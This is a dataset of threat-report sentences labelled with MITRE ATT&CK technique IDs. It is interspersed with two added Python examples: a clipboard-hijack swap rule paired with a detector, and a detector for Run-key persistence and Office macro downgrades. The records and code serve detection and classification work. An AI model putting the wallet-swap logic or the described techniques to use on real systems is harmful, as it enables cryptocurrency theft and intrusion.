{"text1":"2) Shell scripts used to launch the QEMU images. 3) Daemons used to start the shell scripts at boot and keep them running. 4) A CPU monitor shell script with an accompanying daemon that can start\/stop the mining based on CPU usage and whether the Activity Monitor process is running","labels":"['T1057']"}
{"text1":"It does so by monitoring the content of the clipboard and if the data seem to be a cryptocurrency wallet, it replaces them with the attacker\u2019s own. This technique is not new; it has been used by other malware in the past \u2013 even the infamous BackSwap banking trojan implemented it in its earliest stages","labels":"['T1565.002']"}
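Added example for the clipboard-hijacking record above (example code written for this page, not the malware's code). It shows the rule a clipper applies on each clipboard change and, beside it, a detection over a sequence of clipboard-set events: an address overwritten by a different address of the same family, by a different process, within a short window is something the user did not do. The wallet regexes are loose approximations, and the process names, timings and addresses in the sample events are constructed.

```python
"""Clipper rule and matching detection (added example, not malware code from
the page). Address patterns are approximate; sample events are constructed."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Loose address shapes; real clippers carry many more families and tighter checks.
WALLET_PATTERNS = {
    "btc_legacy": re.compile(r"[13][a-km-zA-HJ-NP-Z1-9]{25,34}"),
    "btc_bech32": re.compile(r"bc1[a-z0-9]{39,59}"),
    "eth": re.compile(r"0x[0-9a-fA-F]{40}"),
}


def wallet_kind(text: str) -> Optional[str]:
    """Return which address family the clipboard text looks like, if any."""
    s = text.strip()
    for kind, pat in WALLET_PATTERNS.items():
        if pat.fullmatch(s):
            return kind
    return None


def clipper_swap(text: str, attacker_wallets: dict) -> str:
    """The rule applied on every clipboard change: if the text is a wallet address
    of a family the attacker has a wallet for, hand back the attacker's instead."""
    kind = wallet_kind(text)
    return attacker_wallets.get(kind, text) if kind else text


@dataclass(frozen=True)
class ClipEvent:
    t_ms: int      # time the clipboard was set
    owner: str     # process that set it (GetClipboardOwner on Windows)
    text: str


def find_hijacks(events: List[ClipEvent], window_ms: int = 1000) -> list:
    """Flag an address overwritten by a different address of the same family,
    by a different process, within window_ms of the original copy."""
    hits, last = [], None
    for ev in sorted(events, key=lambda e: e.t_ms):
        kind = wallet_kind(ev.text)
        if kind is None:
            last = None          # a non-address copy breaks the chain
            continue
        if (last is not None and last[1] == kind and last[0].text != ev.text
                and last[0].owner != ev.owner and ev.t_ms - last[0].t_ms <= window_ms):
            hits.append({"kind": kind, "original": last[0].text,
                         "replacement": ev.text, "by": ev.owner})
        last = (ev, kind)
    return hits


# Constructed sample: a user copies two addresses; a hypothetical 'updsvc.exe'
# rewrites each within about 100 ms. Addresses and process names are made up
# for the example (the BTC strings are well-known public example addresses).
ATTACKER_WALLETS = {"btc_legacy": "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa",
                    "eth": "0x" + "cd" * 20}
SAMPLE_EVENTS = [
    ClipEvent(0, "chrome.exe", "1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2"),
    ClipEvent(90, "updsvc.exe",
              clipper_swap("1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2", ATTACKER_WALLETS)),
    ClipEvent(5000, "chrome.exe", "meeting notes"),
    ClipEvent(6000, "chrome.exe", "0x" + "ab" * 20),
    ClipEvent(6100, "updsvc.exe", clipper_swap("0x" + "ab" * 20, ATTACKER_WALLETS)),
]

if __name__ == "__main__":
    for h in find_hijacks(SAMPLE_EVENTS):
        print(h)
```

The owner check is what keeps this usable: a password manager or wallet app legitimately rewriting its own clipboard content shows the same owner twice, while a clipper running as a separate process does not.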
{"text1":"The data exchanged between the module and the C&C is encrypted with a proprietary algorithm and then encoded as readable latin characters","labels":"['T1132.002']"}
{"text1":"In earlier attacks, the group used malicious Microsoft Word documents to infect victims, with compromised websites being added to the mix as a more recent attack vector","labels":"['T1566.001']"}
{"text1":"It eventually downloads a PowerShell module from an Amazon S3 bucket URL hxxps:\/\/s3[.]amazonaws[.]com\/doclibrarysales\/test[.]txt and then executes it","labels":"['T1583.006', 'T1102']"}
{"text1":"The script variant of the Helminth Trojan consists of a VBScript and PowerShell script named update.vbs and dns.ps1. We aptly named this variant the script version, as we found another version of this Trojan that we will discuss later in this Appendix","labels":"['T1059.005']"}
{"text1":"C2 commands are represented as seemingly random alphanumerical ASCII strings (e.g. These dynamic updates to Goldmax configuration data enable ability to set a new activation date, replace the existing C2 URL and User-Agent values, enable\/disable decoy network traffic feature, and update the number range used by its PRNG","labels":"['T1059.003']"}
{"text1":"In order to meet the phishing emails\u2019 infrastructure requirements, disposable domains and emails were used as the delivery medium. On occasions, the phishing emails contained links to external domains to download the first stage, and sometimes the first stage was attached to the email itself","labels":"['T1566.002']"}
{"text1":"Once installed, JSSLoader provides the threat group with a backdoor to the victim\u2019s computer and the organization","labels":"['T1204.002', 'T1047']"}
{"text1":"To do so, this malware attempts to spread to other systems on network using what are likely stolen administrator credentials. This is again similar to the 2012 Shamoon attacks, where compromised but legitimate credentials obtained in advance of the attacks were also hard coded into the malware to aid in its propagation. Disttrack also has the ability to download and execute additional applications to the system, as well as remotely set the date to start wiping systems","labels":"['T1569.002']"}
{"text1":"This data theft module appears to have been compiled in May 2015 and is designed to watch removable drives and collect files from them, depending on a set of rules defined by the attackers. The stolen data is copied into a hidden directory as \u201c%MYPICTURES%\\%volume serial number%\u201c, from where it can be exfiltrated by the attackers using one of the AZZY implants","labels":"['T1074.001', 'T1025']"}
{"text1":"The implant consists of a modified Cisco IOS image that allows the attacker to load different functional modules from the anonymity of the internet. Each of the modules are enabled via the HTTP protocol (not HTTPS), using specifically crafted TCP packets sent to the router's interface. The packets have a nonstandard sequence and corresponding acknowledgment numbers. The modules can manifest themselves as independent executable code or hooks within the router's IOS that provide functionality similar to the backdoor password","labels":"['T1205']"}
{"text1":"Spearphishing Attachment (ATT&CK T1193) is one of the most used Initial Access techniques used by ransomware families as in Sodinokibi. Attackers use spam emails with an attached MS Office Word document including a malicious macro to download the ransomware to the target system. In order to show the lifecycle of Sodinokibi ransomware, we analyzed a Microsoft Word document. Sodinokibi is a \u201cRansomware-as-a-Service (RAAS) malware, so its distribution methods vary depending on the attacker distributing it","labels":"['T1566.001']"}
{"text1":"Collects information about the infected system, network, drives, and installed applications. Saves the collected information to a file named \u201cinfo\u201d in \u201c%appdata%\\Micorosoft\\Templates\u201d and sends it to the C2","labels":"['T1082']"}
{"text1":"As can be seen from the Table 2 above, Kazuar has an extensive command set, many of which are similar in functionality as other backdoor Trojans. However, a few commands specific to Kazuar appear to be unique and are worth further discussion","labels":"['T1029']"}
{"text1":"Adversaries aiming to exfiltrate large amounts of data will often use one or more systems or storage locations for intermittent storage of the collected data. This process is called staging and is one of the activities that NCC Group and Fox-IT have observed in the analysed C2 traffic","labels":"['T1560.001', 'T1074.001', 'T1074.002']"}
{"text1":"The employee receiving this email downloaded and opened the document, which contained malicious code. Once the code was executed, a persistence mechanism was installed and a malicious password harvester was executed. In this instance, once the malicious code was executed, it dropped a malicious binary (DLL) similar to CobaltStrike, which subsequently created and executed additional files. The actor used the initially compromised system to escalate privileges and move laterally across additional systems on the network","labels":"['T1566.001']"}
{"text1":"FANCY BEAR adversary used different tradecraft, deploying X-Agent malware with capabilities to do remote command execution, file transmission and keylogging. It was executed via rundll32 commands such as","labels":"['T1059.003', 'T1059', 'T1218.011']"}
{"text1":"Lucifer is quite powerful in its capabilities. Not only is it capable of dropping XMRig for cryptojacking Monero, it\u2019s also capable of command and control (C2) operation and self-propagation through the exploitation of multiple vulnerabilities and credential brute-forcing. Additionally, it drops and runs EternalBlue, EternalRomance, and DoublePulsar backdoor against vulnerable targets for intranet infections","labels":"['T1210']"}
{"text1":"We have rounded up 220 samples of the CARBANAK backdoor and compiled a table that highlights some interesting details that we were able to extract. It should be noted that in most of these cases the backdoor was embedded as a packed payload in another executable or in a weaponized document file of some kind. The MD5 hash is for the original executable file that eventually launches CARBANAK, but the details of each sample were extracted from memory during execution. This data provides us with a unique insight into the operational aspect of CARBANAK and can be downloaded here","labels":"['T1055.002']"}
{"text1":"The execution chain ensures that persistence is set on the affected system using a .lnk\u00a0file in the Startup directory. The .lnk\u00a0file shown in Figure 17 opens the malicious VBS dropped on the system","labels":"['T1547.001']"}
{"text1":"In the final stage of its attacks, the TeleBots group always used the KillDisk malware to overwrite files with specific file extensions on the victims\u2019 disks. The KillDisk malware used in the first wave of December 2016 attacks, instead of encrypting, simply overwrites targeted files","labels":"['T1485']"}
{"text1":"If that configuration is not available, it utilizes a hardcoded configuration in the binary. The tool uses a custom binary protocol over sockets for its command and control communication with the GUP Proxy Tool and all transferred data is encrypted using a modified version of RC4 encryption","labels":"['T1095']"}
{"text1":"The implant receives HTTP-based commands from a control server and parses the HTTP Content-Type and Content-Length from the HTTP header. If the HTTP Content-Type matches the following value, then the implant executes the command specified by the control server","labels":"['T1071.001']"}
{"text1":"The compressed_data field is compressed using the common ZLIB compression algorithm. Additionally, in the event data is being sent via HTTP rather than HTTPS, the following additional encryption algorithm is applied to the POST data","labels":"['T1560.002', 'T1573.001']"}
{"text1":"The macro creates a copy of the files with their proper extensions using Extensible Storage Engine Utilities (esentutil.exe) with the following commands (esentutil.exe is also a legitimate program that is pre-installed in Windows","labels":"['T1036']"}
{"text1":"At the second stage, the attackers remotely connected to the device and scanned the local network seeking to gain access to public shared folders, web servers, and any other open resources. The aim was to harvest information about the network, above all, servers and workstations used for making payments. If the firewall blocked access from one segment of the network to another, but allowed a reverse connection, the attackers used a different payload to build tunnels","labels":"['T1135']"}
{"text1":"Before being deleted, the DLL executes a string decoding routine that is designed to execute for about a minute, spiking central processing unit (CPU) usage for the regsvr32.exe process. Once the strings are decoded, the More_eggs components are decrypted, dropped to the system (normally in the %APPDATA%\\Microsoft\\ or %ProgramData%\\Microsoft\\ directories) and executed","labels":"['T1140']"}
{"text1":"The very narrow and specific set of email identifiers and organizations observed by CTU researchers strongly indicate that the campaign is focused on U.S. Based on the identified targets, CTU researchers assess with low confidence that a Russian government-sponsored threat group may be responsible for this campaign. Third-party researchers attribute this campaign to the Russia-based IRON RITUAL threat group (also known as NOBELIUM and APT29). IRON RITUAL has been linked to the SUNBURST malware used in the SolarWinds supply chain attack","labels":"['T1566.002']"}
{"text1":"Then the article describes how, since the beginning of 2019, the group has been leveraging self-extracting archives to run code","labels":"['T1053.005', 'T1218.010', 'T1027']"}
{"text1":"Finally, the loader spawns cmd.exe to perform a series of reconnaissance commands to obtain information about the network and domain","labels":"['T1482', 'T1059.003']"}
{"text1":"The checks are done in an obfuscated way within the jumble of the code that the malware has (in the virtual machine used here the Spanish language of Spain (es-ES) was used; it is the code 0xC0A that appears in the stack in the screenshot","labels":"['T1082']"}
{"text1":"Gather the names of all services running on the system. Gather a list of the names of all processes running on the endpoint. Get Microsoft Version Number from the registry, specifically from reg key\/value:\u00a0HKEY_CLASSES_ROOT\\Excel.Application\\CurVer||Default. The instrumentor script also enables all macros for Office by setting the VBAWarnings registry value to 0x1 at:\u00a0HKCU\\Software\\Microsoft\\Office\\<OfficeVersionNumber>.0\\Word\\Security\\VBAWarnings = 0x1","labels":"['T1012']"}
{"text1":"It also creates a folder in C:\\SDRSMLINK\\ and shares this folder with the rest of the network","labels":"['T1547.001', 'T1564.006']"}
{"text1":"In October 2016 Group-IB published the report about the Cobalt group. Now, a year later, this group is continuing to attack banks, which is reported monthly by Group-IB's Threat Intelligence team. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. However, some of the email addresses belong to employees that no longer work at the organization, which means that the Cobalt group likely uses out-of-date mailing lists. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks. From our experience, the Cobalt group uses a new method to provide its survivability in every attack. The former module is installed on a system that has access to the Internet and provides interaction with the C&C server using HTTP\/HTTPS\/DNS protocols. Another module is installed even in systems that do not have Internet access, as, using SMB protocol (which is typically used within a local network), the SMB module is controlled via infected computers running the HTTP\/HTTPS\/DNS module. For interaction on HTTPS protocol, HTTP protocol profiles may be used with an indicated SSL certificate, but for data exchange on the DNS protocol, it requires DNS A, AAAA, and TXT records. Conclusion After infecting one computer on an organization's network, the Cobalt group analyzes the programs used on it and searches for critical servers and the computers from which they are accessed","labels":"['T1021.001']"}
{"text1":"We recently observed an instance where the FlawedAmmyy downloader was not digitally signed (FlawedAmmyy RAT payload is still signed, however). It could be a blip \u2014 perhaps a one-off \u2014 but it's still notable","labels":"['T1553.002']"}
{"text1":"Its sole purpose is to load setup.dll using LoadLibraryA. If not, it will attempt to obtain such privileges using token impersonation if the version of Windows is below Windows 7 build 7601; otherwise it will attempt different UAC bypass techniques, allowing installation of the payload loader into one of","labels":"['T1548.002']"}
{"text1":"Most of the infected sites use the TYPO3 CMS (see: https:\/\/typo3.org\/), which could indicate the attackers are abusing a specific vulnerability in this publishing platform","labels":"['T1071.001']"}
{"text1":"In the past, Emissary Panda has used many ways to target their victims, with the most notable being the exploits from the Hacking Team leak. Usually, the delivered payload is either the well-known \u2018PlugX\u2019 or \u2018HttpBrowser\u2019 RAT, a tool which is believed to have Chinese origins and to be used only by certain Chinese hacking groups","labels":"['T1027']"}
{"text1":"Both RATs provide a wide range of functionality on the target machine, ranging from collecting files, watching the screen, to capturing passwords and keystrokes. The RATs also enable the operator to remotely delete files, and spy on the computer user via the microphone or webcam","labels":"['T1070.004']"}
{"text1":"A copy of the initial EXE for GuLoader is made persistent, then the original is deleted from the infected user\u2019s AppData\\Local\\Temp directory where it was originally saved. The GuLoader EXE is persistent through the Windows Registry under the following key","labels":"['T1547.001']"}
{"text1":"And, of course, the attackers added the ability to control the infected machine. The code receives a binary blob official M.E.Doc server, decrypts it using the Triple DES algorithm, and, afterwards, decompresses it using GZip. The result is an XML file that could contain several commands at once. This remote control feature makes the backdoor a fully-featured cyberespionage and cybersabotage platform at the same time","labels":"['T1070.004']"}
{"text1":"mailsearcher32 module This module searches the infected system\u2019s files to gather email addresses for information-stealing purposes. Emotet, according to previous research by Brad Duncan, is also responsible for delivering this password-grabbing Trickbot variant, as well as Azorult, to users","labels":"['T1083', 'T1087.003']"}
{"text1":"Otherwise, it will add the binary\u2019s path to the Software\\Microsoft\\Windows\\CurrentVersion\\Run key with \u2014Update as a parameter","labels":"['T1547.001']"}
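Added detection example covering three registry-write records above: the GuLoader copy persisted under a Run key, the Run key entry written with an Update parameter, and the instrumentor script that sets Word's VBAWarnings to 1. This is example code written for this page, not any vendor's rule set; the events are constructed to resemble the Image, TargetObject and Details fields of a Sysmon registry value-set event (Event ID 13) but are not real telemetry, and the paths, SID and process names are made up.

```python
"""Run-key persistence and macro-security downgrade detection (added example,
not vendor code). Events are constructed tuples shaped like Sysmon Event ID 13:
(image, target_object, details)."""
import re
from typing import Iterable, List, Optional, Tuple

RUN_KEY = re.compile(
    r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\[^\\]+$", re.I)
VBA_WARNINGS = re.compile(
    r"\\Software\\Microsoft\\Office\\\d+\.0\\(Word|Excel|PowerPoint)\\Security\\VBAWarnings$", re.I)
# Locations an unprivileged user can write to; autoruns pointing here deserve a look.
USER_WRITABLE = re.compile(r"\\(AppData|ProgramData|Temp|Users\\Public)\\", re.I)
DWORD = re.compile(r"DWORD \(0x([0-9A-Fa-f]{8})\)")

Event = Tuple[str, str, str]


def dword(details: str) -> Optional[int]:
    """Parse Sysmon's 'DWORD (0x00000001)' rendering of a REG_DWORD value."""
    m = DWORD.search(details)
    return int(m.group(1), 16) if m else None


def detect(events: Iterable[Event]) -> List[dict]:
    hits = []
    for image, target, details in events:
        if RUN_KEY.search(target) and (USER_WRITABLE.search(details)
                                       or USER_WRITABLE.search(image)):
            hits.append({"rule": "run_key_from_user_writable_path",
                         "technique": "T1547.001",
                         "image": image, "target": target, "details": details})
        elif VBA_WARNINGS.search(target) and dword(details) == 1:
            # VBAWarnings: 1 = enable all macros, 2 = disable with notification,
            # 3 = disable except digitally signed, 4 = disable without notification.
            hits.append({"rule": "office_macros_enabled_all",
                         "technique": "macro security downgrade",
                         "image": image, "target": target, "details": details})
    return hits


# Constructed sample events (paths, SID and process names are made up).
SAMPLE_EVENTS = [
    # benign: an installer under Program Files registering its own tray app
    (r"C:\Program Files\Vendor\setup.exe",
     r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\VendorTray",
     r"C:\Program Files\Vendor\tray.exe"),
    # loader-style: a copied EXE in a user-writable path persisting itself with a flag
    (r"C:\Users\alice\AppData\Roaming\svcupd.exe",
     r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\svcupd",
     r"C:\Users\alice\AppData\Roaming\svcupd.exe --Update"),
    # instrumentor-script style: a script host sets VBAWarnings to 1 (enable all)
    (r"C:\Windows\System32\wscript.exe",
     r"HKU\S-1-5-21-1\Software\Microsoft\Office\16.0\Word\Security\VBAWarnings",
     "DWORD (0x00000001)"),
    # benign: Word itself writing the usual default of 2
    (r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     r"HKU\S-1-5-21-1\Software\Microsoft\Office\16.0\Word\Security\VBAWarnings",
     "DWORD (0x00000002)"),
]

if __name__ == "__main__":
    for h in detect(SAMPLE_EVENTS):
        print(h["rule"], "<-", h["image"])
```

The user-writable-path filter is a triage heuristic, not a verdict: plenty of legitimate per-user software autoruns from AppData, so in production this rule feeds an allowlist of known images rather than paging anyone directly. The VBAWarnings check is sharper, because no ordinary workflow sets that value to 1 from a script host.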
{"text1":"Once an attacker has admin access to a Domain Controller, the KRBTGT account password hashes can be extracted using Mimikatz","labels":"['T1550.003']"}
{"text1":"The persistence mechanisms also change, offering the options to use XDG Autostart Entries and crontabs for persistence. We\u2019ve waxed lyrical about crontabs before, but we haven\u2019t explored XDG Autostart Entries in detail","labels":"['T1547.013']"}
{"text1":"browser history from Firefox, Google Chrome, Microsoft Edge and Internet Explorer; - usernames and passwords stored in the listed browsers; - email accounts from Microsoft Outlook and Mozilla Thunderbird","labels":"['T1555.003', 'T1087.003']"}
{"text1":"After using RTF files, the group started using self-extracting (SFX) archives that use common document icons in an attempt to further mislead their victims. It was briefly documented by Threatbook (in Chinese). When run, these self-extracting RAR files drop and execute DLL files (with a .ocx extension) with the final payload being the previously documented {A96B020F-0000-466F-A96D-A91BBF8EAC96}.dll. This section will describe the technique and what they have altered to achieve their goal","labels":"['T1547.001']"}
{"text1":"H1N1 has added a plethora of new functionality in comparison to earlier reports. Throughout this blog series we will be analyzing the capabilities of H1N1 including: obfuscation, a User Account Control (UAC) bypass, information stealing, data exfiltration, loader\/dropper, and self-propagation\/lateral movement techniques used by this variant.1,2","labels":"['T1027']"}
{"text1":"Attempted to blend in with a file name that matched the system name it resided on - Configured for persistence via a crontab entry with a @reboot line - Used likely compromised infrastructure for C2","labels":"['T1036.005', 'T1036']"}
{"text1":"RAR archiving \u2013 files are transferred to staging servers before exfiltration. They may be encrypted or compressed, to make them easier to extract. Certutil \u2013 a command-line utility that can be exploited and used for various malicious purposes, such as to decode information, to download files, and to install browser root certificates. Adfind \u2013 a command-line tool that can be used to perform Active Directory queries. Csvde \u2013 can be used to extract Active Directory files and data. Ntdsutil \u2013 can be used as a credential-dumping tool. WMIExec \u2013 can be used for lateral movement and to execute commands remotely. It can be used to find information and execute code, and is frequently abused by malicious actors","labels":"['T1560.001']"}
{"text1":"In order to collect even more information, from time to time the Zebrocy operators upload and use dumpers on victims\u2019 machines. The current dumpers have some similarities with those previously used by the group. In this case, Yandex Browser, Chromium, 7Star Browser (a Chromium-based browser), and CentBrowser are targeted, as well as versions of Microsoft Outlook from 1997 through 2016","labels":"['T1555.003']"}
{"text1":"It also moves the JS file to \u2018Shell.NameSpace(28)\u2019 (\u2018ssfLOCALAPPDATA\u2019 \u2013 \u2018\\AppData\\Local\u2019) and creates a scheduled task to use WScript to execute the file at every user log on. The installation routine then copies the keylogger to the registry, sets the uid + 0 flag to 1 to indicate that installation was completed, and executes the scheduled task it created","labels":"['T1053.005']"}
{"text1":"BADFLICK: a backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command and control (C2) configuration. China Chopper: a simple code injection webshell that executes Microsoft .NET code within HTTP POST commands. This allows the shell to upload and download files, execute applications with web server account permissions, list directory contents, access Active Directory, access databases, and any other action allowed by the .NET runtime","labels":"['T1059.004']"}
{"text1":"Then, the malware loads an executable file from WM_DSP resource and runs a shellcode that contains approximately 1500 bytes (after decrypting it with XOR 0x45","labels":"['T1140']"}
{"text1":"Kimsuky uses memory dump programs instead of using well-known malicious software and performs the credential extraction offline. It can be used as a general process dump utility that actors can embed in other scripts, as seen by Kimsuky\u2019s inclusion of ProcDump in the BabyShark malware. The victim is then redirected to the official Chrome Web Store page to install a Chrome extension, which has the ability to steal cookies and site passwords and loads a JavaScript file, named jQuery.js, from a separate site (see figure 3).[51(link is external","labels":"['T1204.002', 'T1555.003']"}
{"text1":"The impact of finding this implant on your network is severe and most likely indicates the presence of other footholds or compromised systems. This backdoor provides ample capability for the attacker to propagate and compromise other hosts and critical data using this as a very stealthy beachhead","labels":"['T1556.004']"}
|
|
{"text1":"InvisiMole is capable of scanning enabled wireless networks on the compromised system. It records information such as the SSID and MAC address of the visible Wi-Fi access points","labels":"['T1016']"}
|
|
{"text1":"Besides the stolen data, it sends the Windows product name and version, username, computer name, and domain name to the C&C server","labels":"['T1082']"}
|
|
{"text1":"The implant has the capability of gathering data from the victim\u2019s system. The following information will be gathered and sent to the command and control server","labels":"['T1560.002']"}
|
|
{"text1":"The threat actors also collected the files \u201cntds.dit\u201d and the \u201cSYSTEM\u201d registry hive. DHS observed the threat actors compress all of these files into archives named \u201cSYSTEM.zip\u201d and \u201ccomps.zip","labels":"['T1560']"}
|
|
{"text1":"Malicious Word .doc file Besides the .pps file, the threat actor uses rich text files to deliver the malware. While other researchers have reported that these files exploit CVE-2012-0158, Symantec has also observed CVE-2015-1641 being exploited to drop Backdoor.Steladok","labels":"['T1189', 'T1203']"}
|
|
{"text1":"Quickly after the initial compromise, the operator deploys a tool named \"dog.exe. This malware is written in .NET and its purpose is to monitor hard drive paths and to exfiltrate the information via an email account or an FTP, depending on the configuration. The configuration file is named dconf.json","labels":"['T1048']"}
|
|
{"text1":"Stealth Falcon demonstrates some familiarity with the patterns of behavior, interests, and activities of its targets, suggesting that the operators may have been working with other sources of information about their targets\u2019 behaviors. In addition, Stealth Falcon displayed above-average operational security throughout the campaign. Stealth Falcon also shows familiarity with creating and maintaining a range of fictitious personas, and registering and managing a significant amount of attack and C2 infrastructure with concern for operational security","labels":"['T1041']"}
|
|
{"text1":"The malware families used in this campaign consisted mainly of malicious documents featuring CARROTBAT downloaders with SYSCON payloads, but also included a new malware downloader Unit 42 has dubbed CARROTBALL","labels":"['T1204.002']"}
|
|
{"text1":"Upon execution, the payload injects into iexplore.exe process and starts encrypting text files and documents of the victim machine","labels":"['T1055']"}
|
|
{"text1":"GOLD CABIN uses malicious documents, often contained in password-protected archives, delivered through email to download and execute payloads. The second-stage payloads are most frequently Gozi ISFB (Ursnif) or IcedID (Bokbot), sometimes using intermediary malware like Valak. GOLD CABIN infrastructure relies on artificial appearing and frequently changing URLs created with a domain generation algorithm (DGA). The URLs host a PHP object that returns the malware as a DLL file","labels":"['T1568.002']"}
|
|
{"text1":"Using valid credentials, CARBON SPIDER moves laterally through victim environments using RDP and occasionally SSH. Occasionally, CARBON SPIDER has deployed the legitimate GoToAssist or TightVNC tools to provide redundant control of hosts","labels":"['T1078']"}
|
|
{"text1":"The Gamaredon group uses a package that includes a custom Microsoft Outlook Visual Basic for Applications (VBA) project. Using Outlook macros to deliver malware is something we rarely see while investigating malicious campaigns","labels":"['T1106', 'T1218.011', 'T1120', 'T1059.005']"}
|
|
{"text1":"Numerous other similarities are present in addition to system reconnaissance methods; the communication mechanism uses the same user agent string as Gold Dragon","labels":"['T1071.001']"}
|
|
{"text1":"Proofpoint researchers frequently observe Silent Librarian\u2019s phishing attempts originating from a university unrelated to their current target using a separate, unrelated university\u2019s URL shortening service. This short URL links to a phishing landing page either directly or via one or more third-party sites that eventually lands the user on a clone of a login portal hosted on an actor-controlled server","labels":"['T1588.002', 'T1598.003', 'T1608.005']"}
|
|
{"text1":"The functional payload is a DLL compiled on 2019-03-11 02:23:54, which has two functionalities depending if the binary has a command line argument -daemon or -worker passed to it. The daemon functionality handles the C2 communications portion of the Trojan, which is configured to communicate with 185.12.45[.]134 over HTTPS using the following URL","labels":"['T1071.001']"}
|
|
{"text1":"O\u2019Reilly of the Defense Criminal Investigative Service (DCIS) of the U.S. Among other things, Zhu and Zhang registered IT infrastructure that the APT10 Group used for its intrusions and engaged in illegal hacking operations. The indictment alleges that the defendants were part of a group that hacked computers in at least a dozen countries and gave China\u2019s intelligence service access to sensitive business information,\u201d said Deputy Attorney General Rosenstein. It's going to take all of us working together to protect our economic security and our way of life, because the American people deserve no less. The APT10 Group used some of the same online facilities to initiate, facilitate and execute its campaigns during the conspiracy. Earlier, beginning in or about 2006, members of the APT10 Group, including Zhu and Zhang, engaged in an intrusion campaign to obtain unauthorized access to the computers and computer networks of more than 45 technology companies and U.S. To avoid antivirus detection, the malware was installed using malicious files that masqueraded as legitimate files associated with the victim computer\u2019s operating system. Such malware enabled members of the APT10 Group to monitor victims\u2019 computers remotely and steal user credentials","labels":"['T1199']"}
|
|
{"text1":"The Iranian attacker group (APT35) and the Chinese attacker group (APT31) targeted campaign staffers\u2019 personal emails with credential phishing emails and emails containing tracking links. As part of our wider tracking of APT31 activity, we've also seen them deploy targeted malware campaigns","labels":"['T1598']"}
|
|
{"text1":"PLEAD and KIVARS, for instance, share the use of RTLO techniques to disguise their installers as documents. Both also use decoy documents to make the RTLO attack more convincing. Another similarity is the use of a small loader component to load encrypted backdoors into memory","labels":"['T1204.002']"}
|
|
{"text1":"Nyetya requires user credentials to spread itself laterally via the PsExec and WMI vectors (which are detailed in the \"Malware Functionality\" section). Talos has identified three ways Nyetya can obtain these credentials. First, credentials can be manually passed in via a command line argument","labels":"['T1078.003']"}
|
|
{"text1":"Often service accounts are members of Domain Admins (or equivalent) or a Domain Admin was recently logged on to the computer an attacker dumps credentials from. Using these credentials, an attacker can gain access to a Domain Controller and get all domain credentials, including the KRBTGT account NTLM hash which is used to create Kerberos Golden Tickets","labels":"['T1550.003']"}
|
|
{"text1":"Analysis of the threat actor\u2019s indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) indicates a correlation with the group known by the names, Pioneer Kitten and UNC757. This threat actor has been observed exploiting several publicly known Common Vulnerabilities and Exposures (CVEs) dealing with Pulse Secure virtual private network (VPN), Citrix NetScaler, and F5 vulnerabilities. This threat actor used these vulnerabilities to gain initial access to targeted networks and then maintained access within the successfully exploited networks for several months using multiple means of persistence","labels":"['T1190']"}
|
|
{"text1":"The touch utility sets the modification and access times of files. If any file does not exist, it is created with default permissions. This makes the utility useful to malware in two common scenarios: for creating an empty file at a given path that is later passed data, and\/or for changing the timestamp on a file as a means of evasion, also known as \u201ctimestomping","labels":"['T1222.002']"}
|
|
{"text1":"For the rest, we acknowledge that the subdomains used could be indicative of the target; they could also be used to go after third parties that might trust those organizations","labels":"['T1583.001']"}
|
|
{"text1":"Both backdoors target Arabic-speaking users. They use code that checks if the compromised machine has the Arabic language installed","labels":"['T1614.001', 'T1614.001']"}
|
|
{"text1":"Digital delivery of over 3,000 APT1 indicators, such as domain names, and MD5 hashes of malware. Thirteen (13) X.509 encryption certificates used by APT1. A set of APT1 Indicators of Compromise (IOCs) and detailed descriptions of over 40 malware families in APT1's arsenal of digital weapons. IOCs that can be used in conjunction with\u00a0Redline\u2122, Mandiant's free host-based investigative tool, or with\u00a0Mandiant Intelligent Response\u00ae (MIR), Mandiant's commercial enterprise investigative tool","labels":"['T1036.005']"}
|
|
{"text1":"Doki uses a previously undocumented method to contact its operator by abusing the Dogecoin cryptocurrency blockchain in a unique way in order to dynamically generate its C2 domain address. The malware has managed to stay under the radar for over six months despite samples being publicly available in VirusTotal","labels":"['T1102']"}
|
|
{"text1":"Using job opportunities as template is the known method used by Lazarus to target its victims. The documents created by this actor are well designed and contain a large icon for a known company such as LockHeed Martin, BAE Systems, Boeing and Northrop Grumman in the template. In this campaign the actor has targeted people that are looking for job opportunities at Lockheed Martin. Targeting the defense industry and specifically Lockheed Martin is a known target for this actor","labels":"['T1566.001']"}
|
|
{"text1":"Since this malicious extension is trying to pass for a legitimate Chrome plugin, Grandoreiro\u2019s developer named it \u201cGoogle Plugin\u201d version 1.5.0. Visually, it adds a square button to the browser window instead of the \u201ccookie\u201d button on the original plugin","labels":"['T1176']"}
|
|
{"text1":"Before writing a keystroke to the log, the malware obtains the current locale identifier using the \u2018GetKeyboardLayout\u2019 API. The retrieved value is checked against several hardcoded paths in which the low DWORD is set to 0x0429","labels":"['T1614.001']"}
|
|
{"text1":"According to the public source data, these airlines use services of the same IT service provider. To help companies detect and hunt for ColunmTK, we have provided a full list of indicators of compromise (IOCs) that we retrieved. It came to light that the cyberattack on this IT service provider affected 4,500,000 data subjects globally, including data related to Air India's customers. ColunmTK Timeline Connections with APT41 Group-IB researchers believe with moderate confidence that the ColunmTK campaign was carried out by APT41, a prolific Chinese-speaking nation-state threat actor. APT41, also known as WICKED SPIDER (PANDA), Winnti Umbrella, and BARIUM, is believed to have been engaging in state-sponsored espionage in China's interests as well as committing financially motivated cybercrimes. APT41 is known for stealing digital certificates for its cyber espionage operations. The IP address was also used to host the Cobalt Strike framework and shared an SSL certificate, b3038101fd0e8b11c519f739f12c7e9b60234d3b, with ColunmTK's IP address 185[.]118[.]166[.]66. Source: Group-IB Threat Intelligence & Attribution Another interesting domain is service[.]dns22[.]ml. In both cases, the files were used to establish persistence in the network. The files are very similar in the way they launch a DLL file as a service and create keys in the registry","labels":"['T1543.003']"}
|
|
